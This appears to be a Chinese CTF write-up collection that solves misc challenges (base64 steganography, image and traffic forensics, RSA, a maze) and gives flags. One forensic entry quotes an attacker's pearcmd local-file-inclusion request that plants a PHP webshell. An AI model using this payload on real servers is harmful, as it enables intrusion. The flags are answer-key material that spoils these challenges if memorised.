WW91JHNhaWQ6JiBvdXJgc3RvcnkgaXMgZW5kaW5nLiJ=
VGhlIHJhaW4gd2FzIGtpbGxpbmcgdGhlIGxhc3WgZGF5cyBvZiBzdW1tZW==
ciwgeW91IGhhZCBiZWVuIGtpbGxpbmcgbXkgbGFzdCBicmVhdGggb2YgbG92ZSwgc2luY2UgYSBsb25nIHRpbWUgYWdvLiC=
SSBzdGlsbCBkb24ndCB0aGluayBJJ20gZ29ubmEgbWFrZSBpdCB0aHJvdU==
Z2ggYW5vdGhlciBsb3ZlIHN0b3J5LiC=
WW91IHRvb2sgaXQgYWxsIGF3YXkgZnJvbSBtZS4g
QW5kIHRoZXJlIEkgc3RhbmQsIEkga25ldyBJIHdhcyBnb2luZyB0byBiZSB0aGUgb25lIGxlZnQgYmVoaW5kLiA=
QnV0IHN0aWxsIEknbSB3YXRjaGluZyB0aGUgbGFrZSwgdmFndWVseSBjb25zY2lvdXMsIGFuZCBJIGtub3cgbXkgbGlmZSBpcyBlbmRpbmcuIH==
SG93ZXZlciBtZWFuIHlvdXIgbGlmZSBpcywgbWVldCBpdCBhbmQgbGl2ZSBpdDt=
RG8gbm90IHNodW7gaXQgYW5kIGNhbGwgaXQgaGFyZCBuYW1lcy7=
SXQlaXMlbm90IHNvIGJhZCBhcyB5b3UlYXJlLl==
SXQgbG9va3MgcG9vcmVzdCB3aGVuIHlvdSBhcmUgcmljaGVzdC4=
VGhlIGZhdWx0LWZpbmRlciB3aWxsIGZpbmQhZmF1bHRzIGluIHBhcmFkaXNlLh==
TG92ZSB5b3VyIGxpZmUsIHBvb3IgYXMgaXQgaXMu
WW91IG1heSB1ZXJoYXBzIGhhdmUgc29tZSB1bGVhc2FudC1gdGhyaWxsaW5nLCBnbG9yaW91c1==
IGhvdXJzLCBldmVuIGluIGEgcG9vci1ob3VzZS4=
VGhlIHNldHRpbmcgc3VuIGlzIHJlZmxlY3RlZCBmcm9tIHRoZSB3aW5kb3dzIG9mIHRoZSBhbG1zLWhv
dXNlIGFzIGJyaWdodGx5IGFzIGZyb20gdGhlIHJpY2ggbWFu4oCZcyBhYm9kZTt=
VGhlIHNub3cgbWVsdHMgYmVmb3JlIGl0cyBkb29yIGFzIGVhcmx5IGluIHRoZSBzcHJpbmcu
SSBkbyBub3Qgc2VlIGJ1dCBhIHF1aWV0IG1pbmQgbWF5IGxpdmUgYXMgY29udGVudGVkbHkgdGhlcmUs
QW5kIGhhdmUmYXMmY2hlZXJpbmcmdGhvdWdodHMsIGFzIGluIGEmcGFsYWNlLm==
VGhlIHRvd27igJlzIHBvb3Igc2VlbSB0byBtZSBvZnRlbiB0byBsaXZlIHRoZSBtb3N0IGluIGRlcGVuZGVudCBsaXZlcyBvZiBhbnku
TWF5IGJlIHRoZXkgYXJlIHNpbXBseSBncmVhdCBlbm91Z2ggdG8gcmVjZWl2ZSB3aXRob3V0IG1pc2dpdmluZ3Mu
TW9zdCB0aGluayB0aGF0IHRoZXkgYXJlIGFib3ZlIGJlaW5nIHN1cHBvcnRlZCBieSB0aGUgdG93bjt=
YnV0IGl0IG9mdGVuIGhhcHBlbnMgdGhhdCB0aGV5IGFyZSBub3QgYWJvdmUgc3VwcG9ydE==
aW5nIHRoZW1zZWx2ZXMgYnkgZGlzaG9uZXN0IG1lYW5zLB==
d2hpY2mmc2hvdWxkIGJlIG1vcmUmZGlzcmVwdXRhYmxlLm==
Q3VsdGl2YXRlIHBvdmVydHkvbGlrZSBhIGdhcmRlbiBoZXJibGlrZSBzYWdlLv==
RG8gbm90IHRyb3VibGUgeW91cnNlbGYgbXVjaCB0byBnZXQgbmV3IHRoaW5ncywgd2hldGhlciBjbG90aGVzIG9yIGZyaWVuZHMu
VHVybiB0aGUgb2xkLCByZXR1cm5gdG8gdGhlbS5=
VGhpbmdzIGRvIG5vdCBjaGFuZ2U7IHdlIGNoYW5nZS5=
U2VsbCB5b3VyIGNsb3RoZXMgYW5kIGtlZXAgeW91ciB0aG91Z2h0cy5=
VGhlIHB1cmUsIHRoZSBicmlnaHQsIHRoZSBiZWF1dGlmdWws
VGhhdCBzdGlycmVkIG91ciBoZWFydHMgaW4geW91dGgs
VGhlIGltcHVsc2VzIHRvIHdvcmRsZXNzIHByYXllciz=
VGhlIGRyZWFtcyBvZiBtb3ZlIGFuZCB0cnV0aDt=
VGhlIGxvbmdpbmcgYWZ0ZXIgc29tZXRoaW5n4oCZcyBsb3N0LK==
VGhlIHNwaXJpdOKJmXMgeWVhcm5pbmcgY3J5LJ==
VGhlIHN0cml2aW5nIGFmdGVyIGJldHRlciBob3Blcw==
VGhlc2UgdGhpbmdzIGNhbiBuZXZlciBkaWUu
VGhlIHRpbWlkIGhhbmQgc3RyZXRjaGVkIGZvcnRoIHRvIGFpZM==
QSBicm90aGVyIGluIGhpcyBuZWVkLN==
QSBraW5kbHkgd29yZCBpbiBncmllZuKAmXMgZGFyayBob3Vy
VGhhdCBwcm92ZXMgYSBmcmllbmQgaW5kZWVkIDv=
VGhlIHBsZWEgZm9yIG1lcmN5IHNvZnRseSBicmVhdGhlZCx=
V2hlbiBqdXN0aWNlIHRocmVhdGVucyBuaWdoLC==
VGhlIHNvcnJvdyBvZiBhIGNvbnRyaXRlIGhlYXJ0
VGhlc2UgdGhpbmdzIHNoYWxsIG5ldmVyIGRpZS4=
TGV0IG5vdGhpbmcgcGFzcyBmb3IgZXZlcnkgaGFuZG==
TXVzdCBmaW5kIHNvbWUgd29yayB0byBkbyA7
TG9zZSBub3agYSBjaGFuY2UgdG8gd2FrZW4gbG92Za==
QmUgZmlybSxhbmQganVzdCAsYW5kIHRydWU7
U28gc2hhbGwgYSBsaWdodCB0aGF0IGNhbm5vdCBmYWRl
QmVhbSBvbiB0aGVlIGZyb20gb25gaGlnaC5=
YW5kIGFuZ2VsIHZvaWNlcyBzYXkgdG8gdGhlZY==
VGhlc2UgdGhpbmdzIHNoYWxsIG5ldmVyIGRpZS7=
R3JhbmRtYSBNb3NlcyBpcyBhbW9uZyB0aGUgbW9zdCBmYW1vdXMgdHdlbnRpZXRoLWNl
bnR1cnkgcGFpbnRlcnMgb2YgdGhlIFVuaXRlZCBTdGF0ZXMsIHlldCBzaG==
ZSBkaWQgbm90IHN0YXJ0IHBhaW50aW5nIHVu
dGlsIHNoZSB3YXMgaW4gaGVyIGxhdGUgc2V2ZW50aWVzLiA=
QXMgc2hlIG9uY2Ugc2FpZCBvZiBoZXJzZWxm77yaIkkgd291bGQgbmV2ZXIgc2l0IGJhY2sg
aW4gYSByb2NraW5nIGNoYWlyLCB3YWl0aW5nIGZvciBzb21lb25lIHRvIGhlbHEgbWUuIiBObyBvbmUgY291bE==
ZCBoYXZlIGhhZCBhIG1vcmUucHJvZHVjdGl2ZSBvbGQuYWdlLu==
U2hlIHdhcyBib3JuIEFubmEgTWFyeSBSb2JlcnRzb24gb24gYSBmYXJtIGluIE5ldyBZb3I=
ayBTdGF0ZSwgb25lIG9mIGZpdmUgYm95cyBhbmQgZml2ZSBnaXJscy4g
QXQgdHdlbHZlIHNoZSBsZWZ0IGhvbWUgYW5kIHdhcyBpbiBkb21lc3RpYyBzZXJ2aWNlIHVudGk=
bCwgYXQgdHdlbnR54oCUc2V2ZW4sIHNoZSBtYXJyaWVkIFRob21hcyBNb3NlcywgdA==
aGUgaGlyZWQgaGFuZCBvZiBvbmUgb2YgaGVyIGVtcGxveWVycy4g
VGhleSBmYXJtZWQgbW9zdCBvZiB0aGVpciBsaXZlcywgZmlyc3QgaW4gVmlyZw==
aW5pYSBhbmQgdGhlbiBpbiBOZXcgWW9yayBTdGF0ZSwgYXQgRWFnbGUgQnJpZGdlLiA=
U2hlIGhhZCB0ZW4gY2hpbGRyZW4gLCBvZiB3aG9tIGZpdmUgc3Vydml2ZWQgOyBoZXIgaHVzYmE=
bmQgZGllZCBpbiAxOTI3Lg==
R3JhbmRtYSBNb3NlcyBwYWludGVkIGEgbGl0dGxlIGFzIGEgY2hpbGQgYW5kIG1hZGUgZW1icm9sZGVyeSBwaQ==
dHVyZXMgYXMgYSBob2JieSwgYnV0IG9ubHkgY2hhbmdlZCB0byBvaWxzIGluIG9s
ZCBhZ2UgYmVjYXVzZSBoZXIgaGFuZHMgaGFkIGJlY29tZSB0b28gc3RpZmYg
dG8gc2V3IGFuZCBzaGUgd2FudGVkIHRvIGtlZXAgYnVzeSBhbmQgcGFzcyB0aGUgdGltZS4g
SGVyIHBpY3R1cmVzIHdlcmUgZmlyc3Qgc29sZCBhdCB0aGUgbG9jYWwgZHJ1Z3N0b3JlIGFuZA==
IGF0IGEgbWFya2V0IGFuZCB3ZXJlIHNvb24gbm90aWNlZCBieSBhIGJ1c2luZQ==
IHNzbWFuIHdobyBib3VnaHQgZXZlcnl0aGluZyBzaGUgcGFpbnRlZCAuIA==
VGhyZWUgb2YgdGhlIHBpY3R1cmVzIGV4aGliaXRlZCBpbiB0aGUgTXVzZXVtIG9mIE1vZGVybiBBcnQsIGFuZCBpbiAxOTQ=
MCBzaGUgaGFkIGhlciBmaXJzdCBleGhpYml0aW9uIGluIE5ldyBZb3JrLiA=
QmV0d2VlbiB0aGUgMTkzMOKAmXMgYW5kIGhlciBkZWF0aCBzaGUgcHJvZHVjZWQgc29tZSAyLDAwMCBwaWN0dXJlc++8miBk
ZXRhaWxlZGFuZCBsaXZlbHkgcG9ydHJheWFscyBvZiB0aGUgY291bnRyeSBsaWZlIHNoZSBoYWQga25vd24gZm9yIA==
c28gbG9uZywgd2l0aCBhIHdvbmRlcmZ1bCBzZW5zZSBvZiBjb2xvdXIgYW5kIGZvcm0uIA==
IkkgdGhpbmsgcmVhbGx5IGhhcmQgdGlsbCBJIHRoaW5rIG9mIHNvbWV0aGluZyByZWFsbHkgcHJldHR5LCBhbg==
ZCB0aGVuIEkgcGFpbnQgaXQuIiBzaGUgc2FpZC4=
SSBoYXZlIHNvdWdodCBsb3ZlLCBmaXJzdCwgYmVjYXVzZSBpdCBicmluZ3MgZWNzdGFzeSAtLSBlY3N0YXN5IHM=
byBncmVhdCB0aGF0IEkgd291bGQgb2Z0ZW4gaGF2ZSBzYWNyaWZpY2VkIGFsbCB0aGUgcmVzdCBvZiBsaWZlIGZvcg==
IGEgZmV3IGhvdXJzIG9mIHRoaXMgam95LiBJIGhhdmUgc291Z2h0IGl0ICwgbmV4dCwgYmVjYXVzZSBpdCByZWxp
IGV2ZXMgbG9uZWxpbmVzcy0tIHRoYXQgdGVycmlibGUgbG9uZWxpbmVzcyBpbg==
ICB3aGljaCBvbmUgc2hpdmVyaW5nIGNv
IG5zY2lvdXNuZXNzIGxvb2tzIG92ZXIgdGhlIHJpbSBvZiB0aGUgd29ybA==
IGQgLCBpbnRvIHRoZSBjb2xkIHVuZmF0aG9tYWJsZSBsaWZlbGVzcyBhYnlzcy4gSSBoYXZlIHNvdWdodCBpdCwgZmk=
IG5hbGx5LCBiZWNhdXNlIGluIHRoZSB1bmlvbiBvZiBsb3ZlIEkgaGF2ZSBzZWVuLCBpbiBhIG15c3RpYyBtaW5pYXQ=
IHVyZSwgdGhlIHByZWZpZ3VyaW5nIHZpc2lvbiBvZiB0aGUgaGVhdmVuIHRoYXQgc2FpbnRzIGFuZCBwb2V0cyBoYXZlIA==
IGltYWdpbmVkLiBUaGlzIGlzIHdoYXQgSSBzb3VnaHQsIGFuZCB0aG91Z2ggaQ==
IHQgbWlnaHQgc2VlbSB0b28gZ29vZCBmb3IgaHVtYW4gbGlmZSwgdGhpcyBp
IHMgd2hhdCAtLSBhdCBsYXN0IC0tIEkgaGF2ZSBmb3VuZC4=
IExvdmUgYW5kIGtub3dsZWRnZSAsIHNvIGZhciBhcyB0aGV5IHdlcmUgcG9zc2libGUsIGxlZCB1cHdhcmQ=
ICB0b3dhcmQgdGhlIGhlYXZlbnMuIEJ1dCBhbHdheXMgcGl0eSBicm91Z2h0IG1lIGJhY2sgdG8gZWFydGgu
ICAgRWNob2VzIG9mIGNyaWVzIG9mIHBhaW4gcmV2ZXJiZXJhdGUgaW4gbXkgaGVhcnQuIENoaWxkcg==
ICAgZW4gaW4gZmFtaW5lLCB2aWN0aW1zIHRvcnR1cmVkIGJ5IG9wcHJlc3NvcnMsIGhlbHBsZXNz
ICAgIG9sZCBwZW9wbGUgYSBoYXRlZCBidXJkZW4gdG8gdGhlaXIgc29ucywgYW4=
ICAgIGQgdGhlIHdob2xlIHdvcmxkIG9mIGxvbmVsaW5lcywgcG92ZXJ0eSwgYW5kIHBh
ICAgIGluIG1ha2UgYSBtb2NrZXJ5IG9mIHdoYXQgaHVtYW4gbGlmZSBzaG91bGQgYmUu
ICAgICBJIGxvbmcgdG8gYWxsZXZpYXRlIHRoZSBldmlsLCBi
ICAgdXQgSSBjYW5ub3QsIGFuZCBJIHRvbyBzdWZmZXIu

base隐写

base58解密

最后flag为

flag{b4se_1s_4_g0od_c0d3}

[NewStarCTF 2023 公开赛道]R通大残

下载附件

r通道全选，stegsolve

最后flag为

flag{a96d2cc1-6edd-47fb-8e84-bd953205c9f5}

[NewStarCTF 2023 公开赛道]2-分析

题目描述:

但你心中仍然有一种不祥的预感，这时你的同事告诉你这台服务器已经被攻击者获取到了权限，需要你尽快去还原攻击者的攻击路径，调查清楚攻击者是如何获取到服务器权限的。；FLAG格式flag{md5(攻击者登录使用的用户名_存在漏洞的文件名_WebShell文件名)}；例如flag{testuser_123.php_shell.php}，将括号内的内容进行md5编码得到flag{58aec571c731faae1369b461d3927596}即为需要提交的Flag

找到用户名

index.php?page=/../../../../usr/share/php/pearcmd&+config-create+/&+/var/www/html/wh1t3g0d.php

这里是在漏洞文件里进行了远程木马的上传，木马文件为wh1t3g0d.php，漏洞文件为index.php

shell文件：wh1t3g0d.php
漏洞文件：index.php
用户名：best_admin

md5加密

最后flag为

flag{4069afd7089f7363198d899385ad688b}

[NewStarCTF 2023 公开赛道]隐秘的眼睛

静默之眼一把梭

最后flag为

flag{R0ck1ng_y0u_63b0dc13a591}

[V&N2020 公开赛]拉胯的三条命令

tcpdump -n -r nmapll.pcapng 'tcp[13] = 18' | awk '{print $3}' | sort -u

最后flag为

flag{21226318013306}

[NPUCTF2020]HappyCheckInVerification

下载附件

得到一个破损的二维码跟mp4视频，通过手动的方式修复二维码

扫描二维码得到

flag{this_is_not_flag}
三曳所諳陀怯耶南夜缽得醯怯勝數不知喝盧瑟侄盡遠故隸怯薩不娑羯涅冥伊盧耶諳提度奢道盧冥以朋罰所即栗諳蒙集皤夷夜集諳利顛呐寫無怯依奢竟#￥#%E68BBFE4BD9BE68B89E6A0BCE79A84E5A7BFE58ABFE59CA8E69C80E5908E32333333||254333254242254338254342254231254338254345254432254238254643254236254145254239254441254437254234254232254131254236254245253244253244254343254438254330254341254336254435...sadwq#asdsadasf faf$use$dasdasdafafa_$ba##se64$

通过||分隔符得到base16解密内容

E68BBFE4BD9BE68B89E6A0BCE79A84E5A7BFE58ABFE59CA8E69C80E5908E32333333
拿佛拉格的姿势在最后2333


254333254242254338254342254231254338254345254432254238254643254236254145254239254441254437254234254232254131254236254245253244253244254343254438254330254341254336254435
%C3%BB%C8%CB%B1%C8%CE%D2%B8%FC%B6%AE%B9%DA%D7%B4%B2%A1%B6%BE%2D%2D%CC%D8%C0%CA%C6%D5
需要选择gb2312的格式：没人比我更懂冠状病毒--特朗普

根据之前提示 use base64 发送了手机号码base64encode的结果，然后返回了一段音频

最后flag为

flag{miSc_ChecK_In_Ver16ied}

[RoarCTF2019]TankGame

坦克大战游戏

import hashlib
data = [
    [8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8],
    [8, 8, 4, 5, 8, 1, 1, 1, 1, 1, 1, 8, 8, 8, 8, 4, 8],
    [8, 2, 8, 1, 8, 8, 5, 1, 8, 8, 8, 1, 8, 1, 8, 4, 8],
    [8, 5, 8, 2, 8, 8, 8, 8, 1, 8, 8, 4, 8, 1, 1, 5, 8],
    [8, 8, 8, 8, 2, 4, 8, 1, 1, 8, 8, 1, 8, 5, 1, 5, 8],
    [8, 8, 8, 8, 5, 8, 8, 1, 5, 1, 8, 8, 8, 1, 8, 8, 8],
    [8, 8, 8, 1, 8, 8, 8, 8, 8, 8, 8, 8, 1, 8, 1, 5, 8],
    [8, 1, 8, 8, 1, 8, 8, 1, 1, 4, 8, 8, 8, 8, 8, 1, 8],
    [8, 4, 1, 8, 8, 5, 1, 8, 8, 8, 8, 8, 4, 2, 8, 8, 8],
    [1, 1, 8, 5, 8, 2, 8, 5, 1, 4, 8, 8, 8, 1, 5, 1, 8],
    [9, 1, 4, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8],
    [1, 1, 8, 1, 8, 8, 2, 1, 8, 8, 5, 2, 1, 8, 8, 8, 8],
    [8, 8, 8, 8, 4, 8, 8, 2, 1, 1, 8, 2, 1, 8, 1, 8, 8],
    [8, 1, 1, 8, 8, 4, 4, 1, 8, 4, 2, 4, 8, 4, 8, 8, 8],
    [8, 4, 8, 8, 1, 2, 8, 8, 8, 8, 1, 8, 8, 1, 8, 1, 8],
    [8, 1, 1, 5, 8, 8, 8, 8, 8, 8, 8, 8, 1, 8, 8, 8, 8],
    [8, 8, 1, 1, 5, 2, 8, 8, 8, 8, 8, 8, 8, 8, 2, 8, 8],
    [8, 8, 4, 8, 1, 8, 2, 8, 1, 5, 8, 8, 4, 8, 8, 8, 8],
    [8, 8, 2, 8, 1, 8, 8, 1, 8, 8, 1, 8, 2, 2, 5, 8, 8],
    [8, 2, 1, 8, 8, 8, 8, 2, 8, 4, 5, 8, 1, 1, 2, 5, 8],
    [8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8]
]
text = ''
for i in range(21):
    for j in range(17):
        text += str(data[i][j])
text = list(text)
def work(data,index,num):
    if num == 3:
        temp=''.join(data)
        if hashlib.sha1('clearlove9'+temp).hexdigest() == '3f649f708aafa7a0a94138dc3022f6ea611e8d01':
            key=hashlib.md5('clearlove9'+temp).hexdigest().upper()[:10]
            flag="RoarCTF{wm-"+key+"}"
            print(flag)
        return
    if index == 21*17:
        return
    if data[index] =='1':
        temp=list(data)
        temp[index]='8'
        work(temp,index+1,num+1)
    work(data,index+1,num)
 
if __name__ == "__main__":
    work(text,0,0)

NewStarCTF 公开赛赛道]WebShell！

题目描述:

溯源攻击者窃取的文件内容！他用了蚁剑诶？ Flag格式为：flag{WebShell密码_黑客获取的用户名_机密文件内容} 例如flag{cmd_root_secret}

webshell密码

黑客获取的用户名：www-data

机密文件内容：Y0UAr3G00D

最后flag为

flag{n3wst4r_www-data_Y0UAr3G00D}

[2022DASCTF MAY 出题人挑战赛]神必流量

nata一把梭

弱密码123456解压7z文件

https://drive.google.com/file/d/140MxBVh-OGvQUuk8tmOw4Xm8it9utIzo/view

打开是一个链接，是Google云盘的两个文件，下载需要科学上网

得到一个main.exe和output.txt，尝试运行exe文件

逆向分析exe文件

参考http://www.snowywar.top/?p=3323

最后flag为

flag{6f938f4c-f850-4f04-b489-009c2ed1c4fd}

[NewStarCTF 公开赛赛道]Whats HTTP

tcp追踪流得到

赛博厨子一把梭

最后flag为

flag{4f33649d030c6778426971b54dd72ece}

[QCTF2018]Noise

请看

从一道Misc到学习百万混音 | KANGEL

[NPUCTF2020]OI的梦

OI の梦 
佐伊有着很神奇的技能，R（折返跃迁）是一个很神奇的技能，在本题中他的大招不会返回。
今天YYH在训练营里快乐的使用着佐伊，在草丛中不断跳来跳去。假设现在共有n个草丛，佐伊有着一
定的跳跃范围，在这里理解为可以从a草丛跳到b草丛，也可以从b草丛跳到a草丛，并且佐伊无法在自
己的草丛再次跳入自己的草丛，那么现在给出m个可以互相跳的草丛ai,bi。请问跳k次后从S跳到T有多
少种方法。
输出的方案数为模10003的余数。
输入格式：第一3个整数,n,m,,k;第二行到第m+1行 每行2个整数ai,bi;表示能从ai跳到bi，也可以从bi跳
到ai。
输出格式：一个整数，表示模10003后的方案数。
输出答案就是flag

矩阵快速幂

exp:

def mulMatrix(x, y):
    ans = [[0 for i in range(101)] for j in range(101)]
    for i in range(101):
        for j in range(101):
            for k in range(101):
                ans[i][j] += x[i][k] * y[k][j]
                ans[i][j] %= 10003
    return ans


def quickMatrix(m, n):
    E = [[0 for i in range(101)] for j in range(101)]
    for i in range(101):
        E[i][i] = 1
    while (n):
        if n % 2 != 0:
            E = mulMatrix(E, m)
        m = mulMatrix(m, m)
        n >>= 1
    return E


matrix = [[0 for i in range(101)] for j in range(101)]
dataIn = open("yyh.in", "r").readlines()
n, m, steps = dataIn[0].strip().split()
m = int(m)
for x in range(0, m):
    i, j = dataIn[x + 1].strip().split()
    i = int(i)
    j = int(j)
    matrix[i][j] = 1
    matrix[j][i] = 1
ans = quickMatrix(matrix, int(steps))
print(ans[1][int(n)])

最后flag为

flag{5174}

[NewStarCTF 2023 公开赛道]依旧是空白

宽高一把梭

snow隐写

最后flag为

flag{2b29e3e0-5f44-402b-8ab3-35548d7a6a11} 

[NewStarCTF 2023 公开赛道]键盘侠

键盘流量natA一把梭

最后flag为

flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}

[NewStarCTF 2023 公开赛道]1-序章

sql盲注的log

直接脚本处理

# [NewStarCTF 2023 公开赛道]1-序章
 
import re
 
with open('access.log','r') as f:
    lines=f.read().split('\n')
 
comp=re.compile(r'user\),([0-9]{1,2}),1\)\)=([0-9]{2,3}),sleep',re.I)
# line=lines[1]
# print(comp.search(line).group(1))
 
flag_ascii={}
for line in lines:
    f=comp.search(line)
    if f:
        key=f.group(1)
        value=f.group(2)
        flag_ascii[key]=value
 
# print(flag_ascii)
 
flag=''
for i in flag_ascii.values():
    flag += chr(int(i))
 
print(flag)

[SWPU2019]Android3

安卓逆向不太会，直接看大佬博客吧

[SWPU2019] Android3 - WXjzc - 博客园

[SWPU2019]Android2

[SWPU2019] Android2 - WXjzc - 博客园

[NewStarCTF 2023 公开赛道]滴滴滴

下载附件

音频是拨号声音，dtmf2num处理

steghide隐写

最后flag为

flag{1nf0rm4t10n_s3cur1ty_1s_a_g00d_j0b_94e0308b}

[NewStarCTF 2023 公开赛道]3-溯源

题目描述:

在调查清楚攻击者的攻击路径后你暗暗松了一口气，但是攻击者仍控制着服务器，眼下当务之急是继续深入调查攻击者对服务器进行了什么操作，同时调查清楚攻击者的身份，请你分析攻击者与WebShell通讯的流量获取攻击者获取的相关信息，目前可以得知的是攻击者使用了冰蝎进行WebShell连接。 Tip：沿着前序题目的进度分析会更符合逻辑，或许有助于解题 FLAG格式：flag{攻击者获取到的服务器用户名_服务器内网IP地址} 例如flag{web_10.0.0.3}

冰蝎流量

请看NewStarCTF2023week4-溯源_ctf 冰蝎-CSDN博客

[INSHack2019]Yet Another RSA Challenge - Part 2

from sympy.ntheory import isprime
from Crypto.Util.number import inverse, long_to_bytes
from collections import OrderedDict
from itertools import combinations

def subsets(s):
    for cardinality in range(len(s) + 1):
        yield from combinations(s, cardinality)

N = 737611163443959284842367849241210504758770468900963447745605275812981372405732262639464389012528980016931096127343933425531508977427016967370838523007185109804122827435442876112926896405911684006913203175001902528962659926046227042479405858100518975905360430463250839310857983177028295643515725251012428553651998860175968606629769294473365526541620801873942073999635165942812779333418405669820767884314938500537161124341967101209379749620814652441184505316661790048734950052497097493871158994129217835162546653468074537465326514182322892918918625260996455179683746164361293138705790829022424332601363202790350347639455664656064705450037947152881312491133191289211419037325704774394630500271194735028396494665835379325963853042514832498826985928063545989015763434053963155703531024791434836954197474393368464043648904368880777954234469571406476568488608818611878807321749318425353873416639028342088117081977903731238631252547599612554002863288409286756260496090170930084625283076970661877432107608911551414435036116940780849204521422482251640736907024303127956310763272428319732230450480696798568635499915064255846815425268220147645177869463315347549456623125597500648525429960478399391403082954189840918045663557930850169068717203841
ciph = 238625175560117519818219655160700093672765696917859228632607011580941239729981338983916209022919475382357227963405365905148115318257038277146986081479123834942285774969894504633426906629030480787741565635778433780362722138925014818166488253621790448543359319453495165651188539177460365420486442547806453231416816633460519873660432319115179116336907802631692806970121302821171652412917375895244055318035607411137420274957028058695317500603598525629698305540801857314426359129633709966978334387372229490871242813925900864337395540528999023305226494361061535292380487362207573111785857146840743150168595521892054972163853976096692431697845761601194595494668734667899627964699784309805348028825617943571577132154874260866191233001610717099049253716197026401372924319018736900888351182876610669592251724095719123094054432644034621312701246109838942945597240248959486831491623970160080568107285964593924238967189856179059372322390416530545895764941716546818701469100406503650604889258155970317233013903059065959366407802296924017896297385415541256814333380793132923243754142847186952683218437937882137950119347398825971468218656558007008879510066175287320907270138115038609371999806062759974181729622851705386276830651522840256814183961092
p = "D78717E5C560636F461952384C67475479931C73E8573DE1658AD9828BA322DF497E2FC6042AE093EC7F194B47AF7E507CFF542F9085A0C526DC4B3B44D6FBEC4CA672FB2F75B56F151E5A103A1CBF6DB17611A6E6D1C054CE7A9D0A2170370E8AD349B98DFD984A6955B97AB7087AF81019C0F31456A6179DB47D2A240E307422D3F968193F8F239035640A357EBC4C3726DBF9935FF243AF8F0A4D458534381B38C3435AC0E61564BF79C7F808C38AB61F5DD2080EC2A2211AAFC17F8E89F99690278D494F1C8D1170C31442D1A8624EAE9938FB874962BBAE8915DA1943FC41B8D8CA675FE35FFD30B1CA5DF21E1BB0F9BC3C1F7CDC7E3E3E3AB834503D51"

switches = [('12','8D'),('33','D4'),('5E','FF'),('09','95'),('E4','38'),('6B','89'),('9E','E0'),('59','3E')]
switches = OrderedDict(reversed(switches))

possible = [p]
for sss in switches:
    news = []
    for x in possible:
        fc = [i for i in range(len(x)) if x[i:i+2]==switches[sss]]
        for sub in subsets(fc):
            y = x
            for i in sub:
                y = y[:i]+sss+y[i+2:]
            u = int(y,16)
            if N%u==0:
                p = u
                q = N//p
                d = inverse(65537,(p-1)*(q-1))
                flag = long_to_bytes(pow(ciph,d,N))
                print(flag)
            if sss!='12':
                news.append(y)
    possible.extend(news) 

[SCTF2019]Maze

大佬脚本

from bs4 import BeautifulSoup


length=100
width=100
maze = [[[1,1,1,1] for j in range(width)]for i in range(length)]
visited = [[0 for j in range(width)]for i in range(length)]
mlength = 0
mnode = (0,0)

def dfs(i, j, depth):
 global mlength
 # print (i,j)
 # print maze[i][j]
 visited[i][j]=1
 # print [visited[i-1][j], visited[i][j+1], visited[i-1][j], visited[i][j-1]]
 while True:
  test = 0
  ti = 0
  tj = 0
  if maze[i][j][0] and not visited[i-1][j]:
   test += 1
   ti = -1
  if maze[i][j][1] and not visited[i][j+1]:
   test += 1
   tj = 1
  if maze[i][j][2] and not visited[i+1][j]:
   test += 1
   ti = 1
  if maze[i][j][3] and not visited[i][j-1]:
   test += 1
   tj = -1
  if test == 1:
   i+=ti
   j+=tj
   depth+=1
   visited[i][j]=1
  else: 
   break

 
 if depth>mlength:
  global mnode
  mlength = depth
  mnode = (i,j)
 if maze[i][j][0] and not visited[i-1][j]:
  dfs(i-1,j,depth+1)
 if maze[i][j][1] and not visited[i][j+1]:
  dfs(i,j+1,depth+1)
 if maze[i][j][2] and not visited[i+1][j]:
  dfs(i+1,j,depth+1)
 if maze[i][j][3] and not visited[i][j-1]:
  dfs(i,j-1,depth+1)


if __name__ == '__main__':
 sourse = open('./Maze.html').read()
 soup = BeautifulSoup(sourse,"html.parser")
 result = soup.select('td')
 # print result
 style = [i.get("style") for i in result]
 for i in range(length):
  for j in range(width):
   k = i*width+j
   if k>len(style):
    break
   walls = style[k]
   if u'border-top' in walls:
    maze[i][j][0] = 0
   if u'border-right' in walls:
    maze[i][j][1] = 0
   if u'border-bottom' in walls:
    maze[i][j][2] = 0
   if u'border-left' in walls:
    maze[i][j][3] = 0

 # print maze
 dfs(0,0,1)
 print mlength
 print mnode
 # print visited
 visited = [[0 for j in range(width)]for i in range(length)]
 dfs(mnode[0],mnode[1],1)
 print mlength
 print mnode

[BJDCTF 2nd]最简单的misc-y1ng

伪加密

文件png缺少文件头，添加文件头

保存并打开文件

hex解码

最后flag为

flag{y1ngzuishuai}